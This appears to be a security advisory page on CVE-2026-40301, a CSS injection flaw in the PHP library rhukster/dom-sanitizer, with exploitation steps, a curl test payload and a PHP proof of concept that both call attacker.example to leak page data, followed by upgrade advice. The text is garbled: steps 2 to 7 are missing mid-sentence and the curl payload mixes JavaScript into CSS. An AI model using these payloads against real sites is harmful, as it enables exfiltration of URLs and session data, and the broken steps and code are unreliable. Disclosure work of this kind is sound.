DOMSanitizer, CSS Injection, CVE-2026-40301 (Moderate)

Listen to this Post

How CVE-2026-40301 Works

  1. The vulnerability exists in `DOMSanitizer::sanitize()` because the function allows `

    `
    8. When an application renders the sanitized output in a browser, the browser processes the CSS rule.
    9. The browser issues a GET request to the attacker‑controlled host, leaking the page URL and other sensitive information.
    10. In some browsers, the attacker can combine CSS attribute selectors with `url()` to exfiltrate cookie or session token values.
    11. The vulnerability was confirmed exploitable in Statamic CMS (GHSA‑g8hv‑8w5p‑cvqg).

    dailycve Form

    Platform: PHP library
    Version: < 1.0.10
    Vulnerability : CSS injection
    Severity: Moderate
    date: 2026‑04‑10

    Prediction: Already patched

    What Undercode Say

    Analytics – check for vulnerable versions
    composer show rhukster/dom-sanitizer | grep versions
    Test payload that leaks the page URL
    curl -X POST https://target.com/upload \
    -F "svg=@<(echo '<svg xmlns=\"http://www.w3.org/2000/svg\"><style> { background: url(https://attacker.example/collect?url='+encodeURIComponent(window.location)+'); }</style></svg>')"
    

    Exploit

    <?php
    require 'vendor/autoload.php';
    use Rhukster\DomSanitizer\DOMSanitizer;
    $svg = '<svg xmlns="http://www.w3.org/2000/svg">
    <style>
    { background: url(https://attacker.example/collect); }
    </style>
    </svg>';
    $sanitizer = new DOMSanitizer(DOMSanitizer::SVG);
    $output = $sanitizer->sanitize($svg);
    echo $output; // The <style> block with url() survives unchanged
    ?>
    

    Protection from this CVE

    • Upgrade to rhukster/dom-sanitizer ≥ 1.0.10.
    • If immediate upgrade is impossible, remove `'style'` from the SVG allowed‑tag array (line 31) and manually strip `